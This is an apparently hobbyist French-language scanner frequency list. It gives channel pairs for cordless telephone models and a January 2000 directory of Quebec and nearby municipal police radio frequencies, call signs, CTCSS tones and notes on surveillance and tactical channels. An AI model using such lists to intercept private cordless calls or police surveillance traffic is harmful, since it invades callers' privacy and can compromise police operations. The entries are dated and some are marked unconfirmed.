902.79000 926.79000 PANASONIC KXT-9000, CH.24
902.82000 926.82000 PANASONIC KXT-9000, CH.25
902.85000 926.85000 PANASONIC KXT-9000, CH.26
902.88000 926.88000 PANASONIC KXT-9000, CH.27
902.91000 926.91000 PANASONIC KXT-9000, CH.28
902.94000 926.94000 PANASONIC KXT-9000, CH.29
902.97000 926.97000 PANASONIC KXT-9000, CH.30
903.00000 927.00000 PANASONIC KXT-9000, CH.31
903.03000 927.03000 PANASONIC KXT-9000, CH.32
903.06000 927.06000 PANASONIC KXT-9000, CH.33
903.09000 927.09000 PANASONIC KXT-9000, CH.34
903.12000 927.12000 PANASONIC KXT-9000, CH.35
903.15000 927.15000 PANASONIC KXT-9000, CH.36
903.18000 927.18000 PANASONIC KXT-9000, CH.37
903.21000 927.21000 PANASONIC KXT-9000, CH.38
903.24000 927.24000 PANASONIC KXT-9000, CH.39
903.27000 927.27000 PANASONIC KXT-9000, CH.40
903.30000 927.30000 PANASONIC KXT-9000, CH.41
903.33000 927.33000 PANASONIC KXT-9000, CH.42
903.36000 927.36000 PANASONIC KXT-9000, CH.43
903.39000 927.39000 PANASONIC KXT-9000, CH.44
903.42000 927.42000 PANASONIC KXT-9000, CH.45
903.45000 927.45000 PANASONIC KXT-9000, CH.46
903.48000 927.48000 PANASONIC KXT-9000, CH.47
903.51000 927.51000 PANASONIC KXT-9000, CH.48
903.54000 927.54000 PANASONIC KXT-9000, CH.49
903.57000 927.57000 PANASONIC KXT-9000, CH.50
903.60000 927.60000 PANASONIC KXT-9000, CH.51
903.63000 927.63000 PANASONIC KXT-9000, CH.52
903.66000 927.66000 PANASONIC KXT-9000, CH.53
903.69000 927.69000 PANASONIC KXT-9000, CH.54
903.72000 927.72000 PANASONIC KXT-9000, CH.55
903.75000 927.75000 PANASONIC KXT-9000, CH.56
903.78000 927.78000 PANASONIC KXT-9000, CH.57
903.81000 927.81000 PANASONIC KXT-9000, CH.58
903.84000 927.84000 PANASONIC KXT-9000, CH.59
903.87000 927.87000 PANASONIC KXT-9000, CH.60
903.00000 927.00000 SAMSUNG SP-R912 ( MONOFREQUENCE )
75.97500 49.68000 TÉLÉPHONES SANS FILS 1-L (MODELES SPECIAUX IMPORTES
75.95000 49.71000 TÉLÉPHONES SANS FILS 2-L - RARES)
75.92000 49.74000 TÉLÉPHONES SANS FILS 3-L
75.90000 49.80000 TÉLÉPHONES SANS FILS 4-L
75.87000 49.77000 TÉLÉPHONES SANS FILS 5-L
75.85000 49.62000 TÉLÉPHONES SANS FILS 6-L
75.82500 49.65000 TÉLÉPHONES SANS FILS 7-L
75.80000 49.59000 TÉLÉPHONES SANS FILS 8-L
75.77500 49.56000 TÉLÉPHONES SANS FILS 9-L
75.75000 49.53000 TÉLÉPHONES SANS FILS 10-L
49.65000 26.51000 TÉLÉPHONES SANS FILS MODELE INCONNU ( RX )
1.69000 49.83000 TÉLÉPHONES SANS FILS ( ANCIENS MODELES - CANAL 1A )
1.71000 49.84500 TÉLÉPHONES SANS FILS ( ANCIENS MODELES - CANAL 2A )
1.73000 49.86000 TÉLÉPHONES SANS FILS ( ANCIENS MODELES - CANAL 3A )
1.75000 49.87500 TÉLÉPHONES SANS FILS ( ANCIENS MODELES - CANAL 4A )
1.77000 49.89000 TÉLÉPHONES SANS FILS ( ANCIENS MODELES - CANAL 5A )
43.72000 48.76000 TÉLÉPHONES SANS FILS (01/25) - Modeles courants
43.74000 48.84000 TÉLÉPHONES SANS FILS (02/25) (USA/Canada).
43.82000 48.86000 TÉLÉPHONES SANS FILS (03/25)
43.84000 48.88000 TÉLÉPHONES SANS FILS (04/25)
43.92000 49.02000 TÉLÉPHONES SANS FILS (05/25)
43.96000 49.08000 TÉLÉPHONES SANS FILS (06/25)
44.12000 49.10000 TÉLÉPHONES SANS FILS (07/25)
44.16000 49.16000 TÉLÉPHONES SANS FILS (08/25)
44.18000 49.20000 TÉLÉPHONES SANS FILS (09/25)
44.20000 49.24000 TÉLÉPHONES SANS FILS (10/25)
44.32000 49.28000 TÉLÉPHONES SANS FILS (11/25)
44.36000 49.36000 TÉLÉPHONES SANS FILS (12/25)
44.40000 49.40000 TÉLÉPHONES SANS FILS (13/25)
44.46000 49.46000 TÉLÉPHONES SANS FILS (14/25)
44.48000 49.50000 TÉLÉPHONES SANS FILS (15/25)
46.61000 49.67000 TÉLÉPHONES SANS FILS (16/25) OU (01/10)
46.63000 49.84500 TÉLÉPHONES SANS FILS (17/25) OU (02/10)
46.67000 49.86000 TÉLÉPHONES SANS FILS (18/25) OU (03/10)
46.71000 49.77000 TÉLÉPHONES SANS FILS (19/25) OU (04/10)
46.73000 49.87500 TÉLÉPHONES SANS FILS (20/25) OU (05/10)
46.77000 49.83000 TÉLÉPHONES SANS FILS (21/25) OU (06/10)
46.83000 49.89000 TÉLÉPHONES SANS FILS (22/25) OU (07/10)
46.87000 49.93000 TÉLÉPHONES SANS FILS (23/25) OU (08/10)
46.93000 49.99000 TÉLÉPHONES SANS FILS (24/25) OU (09/10)
46.97000 49.97000 TÉLÉPHONES SANS FILS (25/25) OU (10/10)
30.07500 39.77500 TÉLÉPHONES SANS FILS (AUSTRALIE F 1/10)
30.10000 39.80000 TÉLÉPHONES SANS FILS (AUSTRALIE F 2/10)
30.12500 39.82500 TÉLÉPHONES SANS FILS (AUSTRALIE F 3/10)
30.15000 39.85000 TÉLÉPHONES SANS FILS (AUSTRALIE F 4/10)
30.17500 39.87500 TÉLÉPHONES SANS FILS (AUSTRALIE F 5/10)
30.20000 39.90000 TÉLÉPHONES SANS FILS (AUSTRALIE F 6/10)
30.22500 39.92500 TÉLÉPHONES SANS FILS (AUSTRALIE F 7/10)
30.25000 39.95000 TÉLÉPHONES SANS FILS (AUSTRALIE F 8/10)
30.27500 39.97500 TÉLÉPHONES SANS FILS (AUSTRALIE F 9/10)
30.30000 40.00000 TÉLÉPHONES SANS FILS (AUSTRALIE F10/10)
1.72500 40.02500 TÉLÉPHONES SANS FILS (AUSTRALIE M 1/5)
1.74000 40.07500 TÉLÉPHONES SANS FILS (AUSTRALIE M 2/5)
1.75500 40.12500 TÉLÉPHONES SANS FILS (AUSTRALIE M 3/5)
1.77000 40.17500 TÉLÉPHONES SANS FILS (AUSTRALIE M 4/5)
1.78500 40.22500 TÉLÉPHONES SANS FILS (AUSTRALIE M 5/5)
26.99500 49.86000 TÉLÉPHONES SANS FILS (PRE-1980 MONOFREQUENCE)
1.64200 47.45625 TÉLÉPHONES SANS FILS (UK CH 1)
1.66200 47.46875 TÉLÉPHONES SANS FILS (UK CH 2)
1.68200 47.48125 TÉLÉPHONES SANS FILS (UK CH 3)
1.70200 47.49375 TÉLÉPHONES SANS FILS (UK CH 4)
1.72200 47.50625 TÉLÉPHONES SANS FILS (UK CH 5)
1.74200 47.51875 TÉLÉPHONES SANS FILS (UK CH 6)
1.76200 47.53125 TÉLÉPHONES SANS FILS (UK CH 7)
1.78200 47.54375 TÉLÉPHONES SANS FILS (UK CH 8)
905.60000 925.50000 TROPEZ DX-900, CANAL 01
905.70000 925.60000 TROPEZ DX-900, CANAL 02
905.80000 925.70000 TROPEZ DX-900, CANAL 03
905.90000 927.80000 TROPEZ DX-900, CANAL 04
906.00000 925.90000 TROPEZ DX-900, CANAL 05
906.10000 926.00000 TROPEZ DX-900, CANAL 06
906.20000 926.10000 TROPEZ DX-900, CANAL 07
906.30000 926.20000 TROPEZ DX-900, CANAL 08
906.40000 926.30000 TROPEZ DX-900, CANAL 09
906.50000 926.40000 TROPEZ DX-900, CANAL 10
906.60000 926.50000 TROPEZ DX-900, CANAL 11
906.70000 926.60000 TROPEZ DX-900, CANAL 12
906.80000 926.70000 TROPEZ DX-900, CANAL 13
906.90000 926.80000 TROPEZ DX-900, CANAL 14
907.00000 926.90000 TROPEZ DX-900, CANAL 15
907.10000 927.00000 TROPEZ DX-900, CANAL 16
907.20000 927.10000 TROPEZ DX-900, CANAL 17
907.30000 927.20000 TROPEZ DX-900, CANAL 18
907.40000 927.30000 TROPEZ DX-900, CANAL 19
907.50000 927.40000 TROPEZ DX-900, CANAL 20
926.00000 902.05000 UNIDEN EXP-901, CANAL 01
926.05000 902.10000 UNIDEN EXP-901, CANAL 02
926.10000 902.15000 UNIDEN EXP-901, CANAL 03
926.15000 902.20000 UNIDEN EXP-901, CANAL 04
926.20000 902.25000 UNIDEN EXP-901, CANAL 05
926.25000 902.30000 UNIDEN EXP-901, CANAL 06
926.30000 902.35000 UNIDEN EXP-901, CANAL 07
926.35000 902.40000 UNIDEN EXP-901, CANAL 08
926.40000 902.45000 UNIDEN EXP-901, CANAL 09
926.45000 902.50000 UNIDEN EXP-901, CANAL 10
926.50000 902.55000 UNIDEN EXP-901, CANAL 11
926.55000 902.60000 UNIDEN EXP-901, CANAL 12
926.60000 902.65000 UNIDEN EXP-901, CANAL 13
926.65000 902.70000 UNIDEN EXP-901, CANAL 14
926.70000 902.75000 UNIDEN EXP-901, CANAL 15
926.75000 902.80000 UNIDEN EXP-901, CANAL 16
926.80000 902.85000 UNIDEN EXP-901, CANAL 17
926.85000 902.90000 UNIDEN EXP-901, CANAL 18
926.90000 902.95000 UNIDEN EXP-901, CANAL 19
926.95000 903.00000 UNIDEN EXP-901, CANAL 20
927.00000 903.05000 UNIDEN EXP-901, CANAL 21
927.05000 903.10000 UNIDEN EXP-901, CANAL 22
927.10000 903.15000 UNIDEN EXP-901, CANAL 23
927.15000 903.20000 UNIDEN EXP-901, CANAL 24
927.20000 903.25000 UNIDEN EXP-901, CANAL 25
927.25000 903.30000 UNIDEN EXP-901, CANAL 26
927.30000 903.35000 UNIDEN EXP-901, CANAL 27
927.35000 903.40000 UNIDEN EXP-901, CANAL 28
927.40000 903.45000 UNIDEN EXP-901, CANAL 29
927.45000 903.50000 UNIDEN EXP-901, CANAL 30
927.50000 903.55000 UNIDEN EXP-901, CANAL 31
927.55000 903.60000 UNIDEN EXP-901, CANAL 32
927.60000 903.65000 UNIDEN EXP-901, CANAL 33
927.65000 903.70000 UNIDEN EXP-901, CANAL 34
927.70000 903.75000 UNIDEN EXP-901, CANAL 35
927.75000 903.80000 UNIDEN EXP-901, CANAL 36
927.80000 903.85000 UNIDEN EXP-901, CANAL 37
927.85000 903.90000 UNIDEN EXP-901, CANAL 38
927.90000 903.95000 UNIDEN EXP-901, CANAL 39
927.95000 904.00000 UNIDEN EXP-901, CANAL 40


****************************************************************************

Fréquences de services de police municipaux
9 Janvier 2000



Fréquence Indicatif CTCSS Localité Notes et détails

154.32500 XJF 546 118.8 ACTON VALE SSI
154.67500 XJI 39 ? ALMA Avec incendies.
154.31000 XJI 39 ALMA Fréquence 2 ? -
453.47500 KNGQ 602 127.3 ALTONA (CLINTON COUNTY),NY VERIFIE DANS PERCON=ok.ANI MOBILE
154.37000 XJF 605 AMOS
411.60000 XJF 892 ARTHABASKA
411.70000 XJH 39 ASBESTOS
412.11250 XJF 531 AYLMER
154.25000 XJG 64 BAIE COMEAU
155.07000 XJG 64 BAIE COMEAU
153.89000 BAIE COMEAU DE INFO MEDAQ
159.09000 ? BAIE COMEAU DE INFO MEDAQ
159.21000 XJF 80 100.0 BEAUHARNOIS AUTRE RPT A 151.265 (PARALLELE)
151.26500 ? 100.0 BEAUHARNOIS NEW JUIL 99 EN // AVEC 159.210 RPR # 2
410.16250 XJO 845* 110.9 BEAUHARNOIS PHONE PATCH. VOIR VALLEYFIELD 159.210/151.265
**155.28000**XJF 616****156.7**BEAUPORT PLUS EN FONCTION - COUVERT PAR LA VILLE DE QUÉBEC
**155.61000**XJF 616****156.7**BEAUPORT PLUS EN FONCTION - COUVERT PAR LA VILLE DE QUÉBEC
154.04000 XJF 894 BEAUPRE
151.19000 XJG 467 ? BECANCOUR A REVOIR
153.95000 XJF 719 100.0 BEDFORD
410.23750 XJF 719? 114.8 BEDFORD NOUVEAU 97.
411.48750 XJF 47 123.0 BELOEIL
155.58000 KLL 714 BENNINGTON .VT LOCAL POLICE
155.52000 ? BENNINGTON.VERMONT
411.67500 XJG 48 BERTHIERVILLE
410.08750 XLP 792 BISHOPTON
154.17500 XJK 26 BLACK LAKE
412.96250 XJH 224 123.0 BLAINVILLE
411.88750 ? 141.3 BOIS DES FILION AVEC TERREBONNE.
410.28750 XJF 725 141.3 BOISBRIAND
410.16250 XJF 552 123.0 BOUCHERVILLE
154.40000 ? BRADFORD, VERMONT
154.01000 XJF 212 100.0 BROMONT ROLLING CODE A L'OCCASION
154.04000 XJF 729 BROMPTONVILLE
412.01250 XJF 498 100.0 BROSSARD
413.01250 XJF 498 100.0 BROSSARD
154.92000 XJF 791 BROWNSBURG
155.73000 ? ? CANAL 2 DE INFO MEDAQ.
413.38750 XJG 425 156.7 CANDIAC
412.56250 XJG 425 156.7 CANDIAC CANDIAC, DELSON, ST CONSTANT
411.03750 VDE 238 CANDIAC CENTRE 9-1-1. 90 RUE MONTCALM.
154.84500 XJF 75 CAP DE LA MADELEINE
155.43000 XJF 75 CAP DE LA MADELEINE
410.23750 VBN 896 100.0 CARIGNAN
411.63750 XJF 746 114.8 CHAMBLY
151.29500 XJF 852 CHAPAIS
411.63750 XJI 270 123.0 CHARLEMAGNE ENCODAGE SSI. CHARLEMAGNE/LEGARDEUR
411.38750 XJG 489 CHARLESBOURG ENQUETEURS - BROUILLAGE NUMERIQUE
412.11250 XJG 489 162.2 CHARLESBOURG F-1 (F-2 = 408.0375)
408.03750 XJG 489 162.2 CHARLESBOURG F-2 (F-1 = 412.1125)
411.11250 XJN 248 167.9 CHATEAUGUAY
411.63750 XJF 912 100.0 CHAUDIÈRE-ETCHEMIN BROUILLEUR NON-PERMANENT (INFO-
410.36250 ? 100.0? CHAUDIÈRE-ETCHEMIN CANAL 2 BROUILLEUR NON PERMANENT.INFO-MEDAQ.
154.31000 XJF 613 CHIBOUGAMAU
410.40000 XJN 283 CHICOUTIMI
154.65000 XJF 590 COATICOOK BROUILLEUR
411.58750 XJO 883 71.9 CONTRECOEUR POLICE DE STE JULIE
142.03500 ? 162.2 CORNWALL, ON RECU EN INVERSIONS (DE TEMPÉRATURE)
154.01000 XJF 212 100.0 COWANSVILLE ROLLING CODE A L'OCCASION
154.16000 XJG 461 100.0 CRABTREE POSTE DE POLICE DE JOLIETTE
413.31250 XJF 448 100.0 DELSON
412.56250 XJG 425 156.7 DELSON CANDIAC, DELSON, ST CONSTANT
411.68750 XJF 448 123.0 DELSON PP
412.91250 XJI 59*** 131.8 DEUX MONTAGNES PASSE SUR EDACS 866 MHZ
867.31250 XJI 59? TRK DEUX MONTAGNES TRUNKING EDACS, POLICE RÉGIONALE.
866.81250 XJI 59? TRK DEUX MONTAGNES TRUNKING EDACS. POLICE RÉGIONALE.
866.31250 XJI 59? TRK DEUX MONTAGNES TRUNKING EDACS. POLICE REGIONALE.
154.37000 XJF 326 DOLBEAU
158.97000 XJF 456 DONNACONA
411.15000 XJI 24 107.2 DRUMMONDVILLE
413.31250 XJI 24 107.2 DRUMMONDVILLE
412.86250 XJI 24 107.2 DRUMMONDVILLE DATA TIM SANS CTCSS. VOIX AVEC CTCSS
412.33750 XJF 608 DRUMMONDVILLE PROTECTION PUBLIQUE
158.97000 XJF 328 EAST ANGUS CONFIRME A.LAF. 23-10-99.
411.70000 XJF 572 114.8 FARNHAM ENCODAGE SSI
153.95000 XJL 602 FERMONT
154.69500 KUZ 980 FINENEW YORK
158.97000 XJF 888 FORESTVILLE
154.02500 XLP 743 GASPE
154.02500 XLP 744 GASPE
154.02500 XLP 745 GASPE
154.04000 XJF 95 110.9 GATINEAU
154.57000 XJF 940 110.9 GATINEAU
154.98000 XJF 95 110.9 GATINEAU
154.98000 XJF 940 110.9 GATINEAU
154.98000 XJI 250 110.9 GATINEAU
154.25000 XJN 588 110.9 GRANBY
155.16000 XJF 68 110.9 GRANBY
155.50500 XJF 68 110.9 GRANBY
154.25000 XJF 68 110.9 GRANBY SSI (VSB) ET NORMAL
411.57500 VOR 713* 114.8 GRANBY (CANTONS DE) ENCODAGE SSI. REVOIR INDICATIF
153.95000 XJN 590 110.9 GRAND MERE
154.35500 GRAND MERE DATA.A REVOIR
159.21000 XJF 80 100.0 GRANDE ILE AUTRE RPT A 151.265 (PARALLELE)
151.26500 ? 100.0 GRANDE ILE NEW JUIL 99 EN // AVEC 159.210 RPT # 2
412.78750 XJG 38 123.0 GREENFIELD PARK
412.88750 XJI 94 173.8 GREENFIELD PARK
411.65000 XJF 297 HUDSON
411.61250 XJF 297 107.2 HUDSON MAJ 311296
412.01250 XJI 46 HULL
412.33750 XJK 214 110.9 HULL
412.98750 XJK 214 110.9 HULL
413.03750 ? 110.9 HULL
411.66250 XJI 211 HUNTINGDON
154.77000 XJK 43 IBERVILLE
412.11250 XJK 43 100.0 IBERVILLE
154.16000 XJG 461 100.0 JOLIETTE ACI RX (800 HZ)
410.10000 XJN 280 JONQUIERE
410.90000 XJL 658 JONQUIERE
411.98750 ? 123.0 KAHNAWAKE PEACE KEEPER
154.01000 XJN 514 KIPAWA
151.14500 XJF 787 114.8 L'ANCIENNE LORETTE OPERATIONS. AVEC INCENDIES.
412.56250 XJF 284 114.8 L'ASSOMPTION ENCODAGE SSI
410.01250 ? LA BAIE
411.66250 ? 94.8 LA PLAINE SSI.
154.13000 XJF 749 LA POCATIERE
412.21250 XJG 90 123.0 LA PRAIRIE RPT VOIX AVEC PL/DATA SANS PL.
154.31000 XJF 792 LA SARRE
411.60000 XJG 495 LA TUQUE
151.53500 XJN 205 LAC BEAUPORT INCENDIES ?
410.93750 XJF 829 118.8 LAC BROME (KNOWLTON) ENCODAGE SSI
411.60000 XJF 717 LAC MEGANTIC
411.01250 XJK 952 141.3 LACHENAIE ENCODAGE SSI PERMANENT.
154.40000 XJH 28 LACHUTE
411.98750 XJH 28 LACHUTE
169.68000 ? 100.0 LAURENTIDES / ST LIN ENCODAGE SSI A L'OCCASION
173.79000 MOBILES> 100.0 LAURENTIDES / ST-LIN ENTREE REPETEUR DE 169.680
412.38750 ? 156.7 LAUZON
143.02500 XJF 586 103.5 LAVAL
143.02500 XJK 912 103.5 LAVAL
143.29500 XJF 586 103.5 LAVAL
143.29500 XJK 912 103.5 LAVAL
143.41500 XJF 586 103.5 LAVAL
143.41500 XJK 912 103.5 LAVAL
143.59500 XJF 586 103.5 LAVAL
143.59500 XJK 912 103.5 LAVAL
143.92500 XJF 586 103.5 LAVAL
143.92500 XJK 912 103.5 LAVAL
151.35500 XJF 586 103.5 LAVAL SIMPLEX ENQUETES
151.23500 XJF 586 103.5 LAVAL SIMPLEX ENQUETEURS
410.68750 ?

  
LE GARDEUR
411.63750 XJF 577 123.0 LE GARDEUR ENCODAGE SSI + TIM (o PL) CHARLEMAGNE/LEGARDEUR
154.37000 XJF 797 LEBEL SUR QUEVILLON
411.62500 XJF 617 LENNOXVILLE
412.56250 XJO 802 LENNOXVILLE
411.60000 XJG 451 123.0 LERY 114.8 hz?
412.98750 ? 156.7 LEVIS CANAL 1 (AVEC INCENDIES) BROUILLNONPERM.
412.38750 ?
LEVIS CANAL 2 (AVEC INCENDIES) BROUILLNON PERM
413.51250 ? 156.7 LEVIS CANAL 3 AVEC INCENDIES
412.06250 XJG 55 110.9 LONGUEUIL F 01 - GENERAL (RCC C.H.P.B.).
412.38750 XJG 55 110.9 LONGUEUIL F 02 - DEGAGEMENT.
412.98750 XJG 55 110.9 LONGUEUIL F 03 - INFORMATIONS (CRPQ)
412.58750 XJG 55 110.9 LONGUEUIL F 04 - NUMERIQUE GENRE SQ A L'OCCASION.
412.96250 XJG 429 136.5 LORETTEVILLE
413.48750 XJG 429 LORETTEVILLE
410.53750 XJF 754 118.8 LORRAINE
453.47500 KNHM 983 110.9 LYON MOUNTAIN (CLINTON CTY) NY LINK ?
154.69500 WRG 846 LYON MOUNTAIN, NY
410.31250 ? 100.0 MAGOG
453.40000 ??? 542 123.0 MALONE, NEW YORK
155.01000 XJK 932 MANIWAKI
411.66250 XJF 783 100.0 MARIEVILLE
413.38750 ? 136.5 MASCOUCHE
411.98750 ? 136.5 MASCOUCHE OK
154.04000 XJF 460 MASSON-ANGERS
155.61000 XJF 555 MATANE
155.79000 XJF 555 MATANE
159.21000 XJF 80 100.0 MELOCHEVILLE AUTRE RPT A 151.265 (PARALLELE)
151.26500 ? 100.0 MELOCHEVILLE NEW JUIL 99 EN // AVEC 159.210 RPT # 2
411.63750 XJO 841 167.9 MERCIER ENCODAGE SSI
412.86250 ? 167.9 MIRABEL POLICE INTERMUNICIPALE. LIEN AVEC 411.5875 ?
411.58750 XJF 576 123.0 MIRABEL XJN575 ? VOIR AUSSI 412.8625 (NOUVEAU)
159.21000 XJF 313 MONT JOLI
153.80000 XJG 428 MONT LAURIER
151.29500 XJF 895 MONT ROLAND ST DONAT
411.56250 XJG 324 100.0 MONT ST HILAIRE
**158.97000 XJF 387********** MONTMAGNY PLUS EN FONCTION - VOIR UHF
410.11250 XJF 387 ? MONTMAGNY OK
410.48750 XJN 335 203.5 MONTREAL
408.03750 XJN 341 203.5 MONTREAL
408.16250 XJN 341 203.5 MONTREAL
408.21250 XJN 335 203.5 MONTREAL
408.26250 XJN 341 203.5 MONTREAL
408.43750 XJK 980 203.5 MONTREAL
408.43750 XJN 335 203.5 MONTREAL
408.53750 XJN 335 MONTREAL
408.61250 XJN 341 MONTREAL
408.66250 XJN 341 MONTREAL
410.11250 XJN 335 203.5 MONTREAL
410.26250 XJN 335 203.5 MONTREAL
410.36250 XJN 335 203.5 MONTREAL
410.58750 XJN 335 203.5 MONTREAL
410.61250 XJN 335 203.5 MONTREAL
410.78750 XJN 335 203.5 MONTREAL
410.91250 XJN 335 203.5 MONTREAL
410.96250 XJN 335 203.5 MONTREAL
411.18750 XJN 335 203.5 MONTREAL
411.37500 XJN 335 203.5 MONTREAL
411.53750 XJN 335 203.5 MONTREAL
412.13750 XJN 335 203.5 MONTREAL
413.23750 XJK 970 203.5 MONTREAL
413.23750 XJN 335 203.5 MONTREAL
413.53750 XJN 335 203.5 MONTREAL
413.61250 XJN 335 203.5 MONTREAL
413.73750 XJN 335 203.5 MONTREAL
413.78750 XJN 335 203.5 MONTREAL
415.66250 XJN 335 203.5 MONTREAL
418.21250 XJN 335 MONTREAL
418.38750 XJN 335 203.5 MONTREAL
418.73750 XJN 335 MONTREAL
418.86250 XJK 274 MONTREAL
410.66250 XJN 335 203.5 MONTREAL 1- 8 : SIMPLEX (ENQUETES,SUIVI,ETC)
408.41250 XJN 335 203.5 MONTREAL ACI RX (1225 HZ)
408.51250 XJN 335 203.5 MONTREAL ACI RX, SURVEILLANCE UNITES 91
412.68750 XJN 335 203.5 MONTREAL CANAL 09 - OPS SPECIALES
411.31250 XJN 335 203.5 MONTREAL CANAL 10 - OPS SPECIALE
418.23750 XJN 335 MONTREAL CANAL 4 - 7 NUMÉRIQUE
413.76250 XJN 335 203.5 MONTREAL CANAL ? (APPELE LE V.V.M.)
413.66250 XJN 335 203.5 MONTREAL CTCSS SI PAS NUMERIQUE CANAL TACTIQUE (AUTOS 72-X)
408.31250 XJN 335 203.5 MONTREAL CTCSS SUR ANALOGUE SINON DVP
418.11250 XJN 335 203.5 MONTREAL DVP UTILISE ET ANALOGUE RARE
413.18750 XJN 335 203.5 MONTREAL DVP=0 PL. 203=ANALOGUE
413.11250 XJN 335 203.5 MONTREAL DVP=O PL. 203 = ANALOGUE
408.11250 XJN 335 203.5 MONTREAL ENCODAGE DVP UTILISE SOUVENT
418.46250 XJN 335 203.5 MONTREAL PL SI PAS EN DVP
410.91250 XJK 968 MONTREAL POSTE ? CW ID RX
410.36250 XJK 968 ----- MONTREAL POSTE. CW ID RX (1300 HZ)
410.26250 XJN 341 203.5 MONTREAL POSTES
418.78750 XJN 335 MONTREAL SURVEILLANCE
418.18750 XJN 341 MONTREAL SURVEILLANCE PHYSIQUE (DVP)
408.63750 XJN 335 203.5 MONTREAL V.A. VOLES (VVM) / HELICO RX
411.46250 ? DVP MONTREAL SQ ? RPT NUMERIQUE ASSEZ ANCIEN. ENTENDU AUSSI A QUÉBEC
411.51250 ? DVP MONTREAL SQ ? RPT NUMERIQUE ASSEZ ANCIEN. ENTENDU AUSSI À QUÉBEC
410.51250 ? DVO MONTREAL SQ ? RPT NUMERIQUE ASSEZ ANCIEN.
412.68750 XJK 980 MONTREAL (MONTAGNE) CANAL 09 - RPT G.E.
411.31250 XJK 980 MONTREAL (MONTAGNE) CANAL 10 - RPT G.E.
410.36250 XJN 486 MONTREAL (MONTAGNE) REPETEUR
410.26250 XJN 486 MONTREAL (MONTAGNE) REPETEUR (ACI RX : 1200 HZ)
410.61250 XJN 486 MONTREAL (MONTAGNE) REPETEUR (ACI RX : 1500 HZ)
410.91250 XJN 486 MONTREAL (MONTAGNE) REPETEUR (RX AUSSI XJK 968)
410.11250 XJK 980 MONTREAL (MONTAGNE) RPT G.E.
410.48750 XJK 980 MONTREAL (MONTAGNE) RPT G.E.
410.58750 XJK 980 MONTREAL (MONTAGNE) RPT G.E.
410.78750 XJK 980 MONTREAL (MONTAGNE) RPT G.E.
410.96250 XJK 980 MONTREAL (MONTAGNE) RPT G.E.
411.37500 XJK 980 MONTREAL (MONTAGNE) RPT G.E.
411.53750 XJK 980 MONTREAL (MONTAGNE) RPT G.E.
412.13750 XJK 980 MONTREAL (MONTAGNE) RPT G.E.
410.61250 XJK 969 MONTREAL (MONTAGNE) RPT G.E. - MT ROYAL.
410.81250 XJK 980 MONTREAL (MONTAGNE) RPT G.E. - T.I.M.3 (DATA)
410.03750 XJK 980 MONTREAL (MONTAGNE) RPT G.E. - TIM 1,CW ID RX
410.33750 XJK 980 MONTREAL (MONTAGNE) RPT G.E. - TIM 2 ACIRX
411.21250 XJK 980 MONTREAL (MONTAGNE) RPT G.E. - TIM 4 (DATA)
155.76000 XJF 807 MT ADSTOCK RPT MT ADSTOCK.
411.63750 ? NEW GLASGOW
154.69500 WXM 690 NEW YORK STATE
154.69500 KQI 740 NEW YORK STATE.
411.65000 XJG 375 103.5 NICOLET
413.70000 XJG 375 NICOLET
155.64500 ? NORTH CONWAY NY
411.57500 XJL 606 107.2 NOTRE DAME DE L'ILE PERROT
411.68750 XJL 606 151.4 NOTRE DAME DE L'ILE PERROT
154.16000 XJG 461 100.0 NOTRE DAME DE LOURDES POSTE DE POLICE DE JOLIETTE
154.16000 XJG 461 100.0 NOTRE DAME DES PRAIRIES POSTE DE POLICE DE JOLIETTE
154.17500 ? ODANAK
140.11500 XJF 27 151.4 OTTAWA
142.48500 XJF 27 151.4 OTTAWA
142.72500 XJF 27 151.4 OTTAWA
142.80000 (ONTARIO) ? OTTAWA
139.92000 XJF 27 151.4 OTTAWA REÇU EN INVERSIONS (de température)
141.09000 XJF 27 151.4 OTTAWA RECOIT EN INVERSIONS, BONS SIGNAUX
142.09500 XJF 27 151.4 OTTAWA RECU EN INVERSIONS (DE TEMPÉRATURE)
142.23000 XJF 27 151.4 OTTAWA RECU EN INVERSIONS (DE TEMPÉRATURE)
411.68750 XJF 886 100.0 OTTERBURN PARK
411.03750 XJF 886 100.0 OTTERBURN PARK DATA TIM SANS CTCSS. VOIX AVEC CTCSS.
154.83000 CFD 693 100.0 PIEDMONT NOUVEAU JAN 1997. 3 MUNICIPALITES.ANI
154.05500 XJF 885 PIERREVILLE
411.68750 XJF 545 151.4 PINCOURT
410.58750 ? 94.8 PLESSISVILLE
154.01000 XJK 283 POINTE BLEUE
410.53750 XJP 743 77.0 POINTE CALUMET 861 BL CHAPELLE
154.37000 XJF 602 PORT CARTIER
154.37000 XJF 602 PORT CARTIER
155.79000 VBQ 792 PORT DE QUEBEC 271 DE L'ESTUAIRE
154.83000 CFD 693 100.0 PREVOST NOUVEAU JAN 1997. 3 MUNICIPALITES.ANI
411.56250 XJF 847 PRINCEVILLE
141.39000 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 1A
141.19500 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 1B.RECOIT SOUVENT EN INVERSIONS
141.30000 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 1C
141.43500 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 2A
141.69000 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 2B
143.65500 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 2C
141.63000 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 3A
141.40500 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 3B
141.70500 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 4A
141.49500 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 4B
141.36000 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 5A
141.72000 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 5B
141.45000 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 6A
141.54000 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 6B
141.55500 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 7A
141.67500 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 7B
142.36500 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 8A
142.66500 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 8B
143.10000 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 8C
143.19000 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 9A
143.64000 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 9B
142.83000 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP CANAL 9C
